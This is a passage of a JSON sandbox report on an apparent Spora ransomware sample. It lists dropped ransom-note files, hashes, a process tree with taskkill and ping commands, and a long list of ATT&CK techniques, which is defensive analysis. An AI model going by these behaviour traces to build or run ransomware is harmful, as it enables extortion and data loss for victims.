"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_7RY6X_.hta", "file_path": "%USERPROFILE%\\Documents\\_HELP_HELP_HELP_7RY6X_.hta", "file_size": 75864, "sha256": "00e094228e1ce5f4c214c0a08ee230c015b15613a3237d56276f1dca772c2f6d", "type_tags": ["html"], "description": "HTML document, Unicode text, UTF-8 text, with very long lines (947), with CRLF line terminators", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_E9PL_.hta", "file_path": "%WINDIR%\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Office\\16.0\\_HELP_HELP_HELP_E9PL_.hta", "file_size": 75864, "sha256": "00e094228e1ce5f4c214c0a08ee230c015b15613a3237d56276f1dca772c2f6d", "type_tags": ["html"], "description": "HTML document, Unicode text, UTF-8 text, with very long lines (947), with CRLF line terminators", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "_HELP_HELP_HELP_UTIVO_.hta", "file_path": "C:\\TorService\\tor\\pluggable_transports\\_HELP_HELP_HELP_UTIVO_.hta", "file_size": 75864, "sha256": "00e094228e1ce5f4c214c0a08ee230c015b15613a3237d56276f1dca772c2f6d", "type_tags": ["html"], "description": "HTML document, Unicode text, UTF-8 text, with very long lines (947), with CRLF line terminators", "runtime_process": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe (PID: 3064)", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": ["1 .ASM Files assembled with MASM 6.14 (Visual Studio 6 SP2) (build: 8444)", "20 .OBJ Files (COFF) linked with LINK.EXE 5.12 (Visual Studio 5 SP2) (build: 8078)"], "imported_objects": [], "file_analysis": ["File contains assembly code", "File appears to contain raw COFF/OMF content", "File is the product of a small codebase (1 files)"], "total_file_compositions_imports": 0}, "processes": [{"uid": "00000000-00003064", "name": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe", "normalized_path": "C:\\6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe", "sha256": "6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189", "av_label": "Trojan.Ransom.Spora.Gen", "av_matched": 18, "av_total": 22}, {"uid": "00000000-00003044", "parentuid": "00000000-00003064", "name": "mshta.exe", "normalized_path": "%WINDIR%\\System32\\mshta.exe", "command_line": "\"%USERPROFILE%\\Desktop\\_HELP_HELP_HELP_QNTKK6_.hta\"", "sha256": "949485ba939953642714ae6831d7dcb261691cac7cbb8c1a9220333801f60820"}, {"uid": "00000000-00003404", "parentuid": "00000000-00003064", "name": "cmd.exe", "normalized_path": "%WINDIR%\\system32\\cmd.exe", "sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}, {"uid": "00000000-00002988", "parentuid": "00000000-00003404", "name": "taskkill.exe", "normalized_path": "%WINDIR%\\system32\\taskkill.exe", "command_line": "taskkill /f /im \"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\"", "sha256": "cb1822a981e9821d571af16b7e37beba5feb8e3dedcdd0461119af9aac0358b3"}, {"uid": "00000000-00002080", "parentuid": "00000000-00003404", "name": "PING.EXE", "normalized_path": "%WINDIR%\\system32\\PING.EXE", "command_line": "ping -n 1 <IPv4>", "sha256": "4ca10dba7ff487fdb3f1362a3681d7d929f5aa1262cdfd31b04c30826983fb1d"}], "mitre_attcks": [{"tactic": "Resource Development", "technique": "Domains", "attck_id": "T1583.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583/001", "informative_identifiers_count": 1, "parent": {"technique": "Acquire Infrastructure", "attck_id": "T1583", "attck_id_wiki": "https://attack.mitre.org/techniques/T1583"}}, {"tactic": "Initial Access", "technique": "Phishing", "attck_id": "T1566", "attck_id_wiki": "https://attack.mitre.org/techniques/T1566", "malicious_identifiers_count": 1}, {"tactic": "Execution", "technique": "Native API", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 15}, {"tactic": "Execution", "technique": "Windows Command Shell", "attck_id": "T1059.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059/003", "informative_identifiers_count": 2, "parent": {"technique": "Command and Scripting Interpreter", "attck_id": "T1059", "attck_id_wiki": "https://attack.mitre.org/techniques/T1059"}}, {"tactic": "Execution", "technique": "Service Execution", "attck_id": "T1569.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569/002", "informative_identifiers_count": 2, "parent": {"technique": "System Services", "attck_id": "T1569", "attck_id_wiki": "https://attack.mitre.org/techniques/T1569"}}, {"tactic": "Execution", "technique": "Windows Management Instrumentation", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Inter-Process Communication", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559", "informative_identifiers_count": 2}, {"tactic": "Execution", "technique": "Shared Modules", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129", "informative_identifiers_count": 4}, {"tactic": "Persistence", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Persistence", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Persistence", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Persistence", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Persistence", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Persistence", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Account Manipulation", "attck_id": "T1098", "attck_id_wiki": "https://attack.mitre.org/techniques/T1098", "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Privilege Escalation", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Windows Service", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003", "informative_identifiers_count": 1, "parent": {"technique": "Create or Modify System Process", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}}, {"tactic": "Privilege Escalation", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Privilege Escalation", "technique": "Registry Run Keys / Startup Folder", "attck_id": "T1547.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547/001", "informative_identifiers_count": 1, "parent": {"technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547"}}, {"tactic": "Privilege Escalation", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Privilege Escalation", "technique": "Component Object Model Hijacking", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015", "informative_identifiers_count": 1, "parent": {"technique": "Event Triggered Execution", "attck_id": "T1546", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546"}}, {"tactic": "Privilege Escalation", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Privilege Escalation", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Privilege Escalation", "technique": "Boot or Logon Autostart Execution", "attck_id": "T1547", "attck_id_wiki": "https://attack.mitre.org/techniques/T1547", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027", "suspicious_identifiers_count": 5, "informative_identifiers_count": 7}, {"tactic": "Defense Evasion", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Defense Evasion", "technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "ListPlanting", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Modify Registry", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Defense Evasion", "technique": "Dynamic-link Library Injection", "attck_id": "T1055.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/001", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Timestomp", "attck_id": "T1070.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/006", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Extra Window Memory Injection", "attck_id": "T1055.011", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/011", "suspicious_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "Token Impersonation/Theft", "attck_id": "T1134.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134/001", "informative_identifiers_count": 1, "parent": {"technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}}, {"tactic": "Defense Evasion", "technique": "Code Signing Policy Modification", "attck_id": "T1553.006", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/006", "suspicious_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Thread Execution Hijacking", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003", "informative_identifiers_count": 1, "parent": {"technique": "Process Injection", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}}, {"tactic": "Defense Evasion", "technique": "File Deletion", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070"}}, {"tactic": "Defense Evasion", "technique": "Masquerading", "attck_id": "T1036", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Hidden Window", "attck_id": "T1564.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564/003", "informative_identifiers_count": 1, "parent": {"technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564"}}, {"tactic": "Defense Evasion", "technique": "Hide Artifacts", "attck_id": "T1564", "attck_id_wiki": "https://attack.mitre.org/techniques/T1564", "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Deobfuscate/Decode Files or Information", "attck_id": "T1140", "attck_id_wiki": "https://attack.mitre.org/techniques/T1140", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Access Token Manipulation", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134", "informative_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "suspicious_identifiers_count": 2}, {"tactic": "Defense Evasion", "technique": "Code Signing", "attck_id": "T1553.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553/002", "informative_identifiers_count": 1, "parent": {"technique": "Subvert Trust Controls", "attck_id": "T1553", "attck_id_wiki": "https://attack.mitre.org/techniques/T1553"}}, {"tactic": "Defense Evasion", "technique": "Embedded Payloads", "attck_id": "T1027.009", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/009", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Indicator Removal", "attck_id": "T1070", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070", "suspicious_identifiers_count": 1}, {"tactic": "Defense Evasion", "technique": "Disable or Modify Tools", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Impair Defenses", "attck_id": "T1562", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562"}}, {"tactic": "Defense Evasion", "technique": "DLL Side-Loading", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002", "informative_identifiers_count": 1, "parent": {"technique": "Hijack Execution Flow", "attck_id": "T1574", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574"}}, {"tactic": "Defense Evasion", "technique": "Mshta", "attck_id": "T1218.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218/005", "malicious_identifiers_count": 1, "parent": {"technique": "System Binary Proxy Execution", "attck_id": "T1218", "attck_id_wiki": "https://attack.mitre.org/techniques/T1218"}}, {"tactic": "Defense Evasion", "technique": "Software Packing", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Obfuscated Files or Information", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}}, {"tactic": "Defense Evasion", "technique": "Execution Guardrails", "attck_id": "T1480", "attck_id_wiki": "https://attack.mitre.org/techniques/T1480", "informative_identifiers_count": 1}, {"tactic": "Credential Access", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Credential Access", "technique": "Credentials from Password Stores", "attck_id": "T1555", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Debugger Evasion", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Information Discovery", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082", "suspicious_identifiers_count": 1, "informative_identifiers_count": 21}, {"tactic": "Discovery", "technique": "Remote System Discovery", "attck_id": "T1018", "attck_id_wiki": "https://attack.mitre.org/techniques/T1018", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Time Based Evasion", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003", "suspicious_identifiers_count": 1, "informative_identifiers_count": 2, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Query Registry", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012", "suspicious_identifiers_count": 2, "informative_identifiers_count": 4}, {"tactic": "Discovery", "technique": "System Time Discovery", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Process Discovery", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 3, "informative_identifiers_count": 8}, {"tactic": "Discovery", "technique": "User Activity Based Checks", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002", "informative_identifiers_count": 1, "parent": {"technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}}, {"tactic": "Discovery", "technique": "Security Software Discovery", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001", "suspicious_identifiers_count": 2, "informative_identifiers_count": 2, "parent": {"technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}}, {"tactic": "Discovery", "technique": "System Owner/User Discovery", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Domain Trust Discovery", "attck_id": "T1482", "attck_id_wiki": "https://attack.mitre.org/techniques/T1482", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "File and Directory Discovery", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083", "malicious_identifiers_count": 1, "suspicious_identifiers_count": 1, "informative_identifiers_count": 12}, {"tactic": "Discovery", "technique": "Application Window Discovery", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010", "informative_identifiers_count": 5}, {"tactic": "Discovery", "technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614", "informative_identifiers_count": 2}, {"tactic": "Discovery", "technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "Virtualization/Sandbox Evasion", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497", "suspicious_identifiers_count": 2}, {"tactic": "Discovery", "technique": "Internet Connection Discovery", "attck_id": "T1016.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016/001", "informative_identifiers_count": 1, "parent": {"technique": "System Network Configuration Discovery", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}}, {"tactic": "Discovery", "technique": "Software Discovery", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Service Discovery", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007", "informative_identifiers_count": 1}, {"tactic": "Discovery", "technique": "System Language Discovery", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001", "informative_identifiers_count": 1, "parent": {"technique": "System Location Discovery", "attck_id": "T1614", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614"}}, {"tactic": "Lateral Movement", "technique": "Lateral Tool Transfer", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570", "informative_identifiers_count": 2}, {"tactic": "Lateral Movement", "technique": "Remote Desktop Protocol", "attck_id": "T1021.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021/001", "informative_identifiers_count": 1, "parent": {"technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}}, {"tactic": "Lateral Movement", "technique": "Remote Services", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Local Data Staging", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001", "informative_identifiers_count": 4, "parent": {"technique": "Data Staged", "attck_id": "T1074", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074"}}, {"tactic": "Collection", "technique": "Local Email Collection", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001", "informative_identifiers_count": 4, "parent": {"technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114"}}, {"tactic": "Collection", "technique": "Archive Collected Data", "attck_id": "T1560", "attck_id_wiki": "https://attack.mitre.org/techniques/T1560", "suspicious_identifiers_count": 2}, {"tactic": "Collection", "technique": "Email Collection", "attck_id": "T1114", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Keylogging", "attck_id": "T1056.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056/001", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1, "parent": {"technique": "Input Capture", "attck_id": "T1056", "attck_id_wiki": "https://attack.mitre.org/techniques/T1056"}}, {"tactic": "Collection", "technique": "Data from Removable Media", "attck_id": "T1025", "attck_id_wiki": "https://attack.mitre.org/techniques/T1025", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Information Repositories", "attck_id": "T1213", "attck_id_wiki": "https://attack.mitre.org/techniques/T1213", "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Data from Local System", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Collection", "technique": "Screen Capture", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071", "suspicious_identifiers_count": 2, "informative_identifiers_count": 7}, {"tactic": "Command and Control", "technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090", "informative_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Mail Protocols", "attck_id": "T1071.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/003", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Multi-hop Proxy", "attck_id": "T1090.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090/003", "informative_identifiers_count": 2, "parent": {"technique": "Proxy", "attck_id": "T1090", "attck_id_wiki": "https://attack.mitre.org/techniques/T1090"}}, {"tactic": "Command and Control", "technique": "Web Protocols", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001", "malicious_identifiers_count": 2, "suspicious_identifiers_count": 3, "informative_identifiers_count": 6, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Asymmetric Cryptography", "attck_id": "T1573.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573/002", "suspicious_identifiers_count": 2, "informative_identifiers_count": 1, "parent": {"technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}}, {"tactic": "Command and Control", "technique": "Ingress Tool Transfer", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105", "informative_identifiers_count": 5}, {"tactic": "Command and Control", "technique": "Non-Application Layer Protocol", "attck_id": "T1095", "attck_id_wiki": "https://attack.mitre.org/techniques/T1095", "suspicious_identifiers_count": 1}, {"tactic": "Command and Control", "technique": "Encrypted Channel", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "Data Encoding", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132", "informative_identifiers_count": 2}, {"tactic": "Command and Control", "technique": "DNS", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004", "informative_identifiers_count": 1, "parent": {"technique": "Application Layer Protocol", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}}, {"tactic": "Command and Control", "technique": "Steganography", "attck_id": "T1001.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1001/002", "suspicious_identifiers_count": 1, "parent": {"technique": "Data Obfuscation", "attck_id": "T1001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1001"}}, {"tactic": "Exfiltration", "technique": "Scheduled Transfer", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029", "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Data Encrypted for Impact", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486", "suspicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Internal Defacement", "attck_id": "T1491.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491/001", "suspicious_identifiers_count": 1, "parent": {"technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491"}}, {"tactic": "Impact", "technique": "Service Stop", "attck_id": "T1489", "attck_id_wiki": "https://attack.mitre.org/techniques/T1489", "malicious_identifiers_count": 1, "informative_identifiers_count": 1}, {"tactic": "Impact", "technique": "Defacement", "attck_id": "T1491", "attck_id_wiki": "https://attack.mitre.org/techniques/T1491", "suspicious_identifiers_count": 1}], "network_mode": "default", "signatures": [{"threat_level_human": "informative", "category": "General", "identifier": "api-138", "type": 6, "relevance": 3, "name": "Calls an API typically used to create an instance of a named pipe", "description": "\"6053e42962b2bcdc4ebb1865c92be864452723fd9782e6db98d7f894f7bfe189.exe\" called \"NtCreateNamedPipeFile\" (UID: 00000000-00003064)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-267", "type": 6, "relevance": 1, "name": "Writes files in a temp 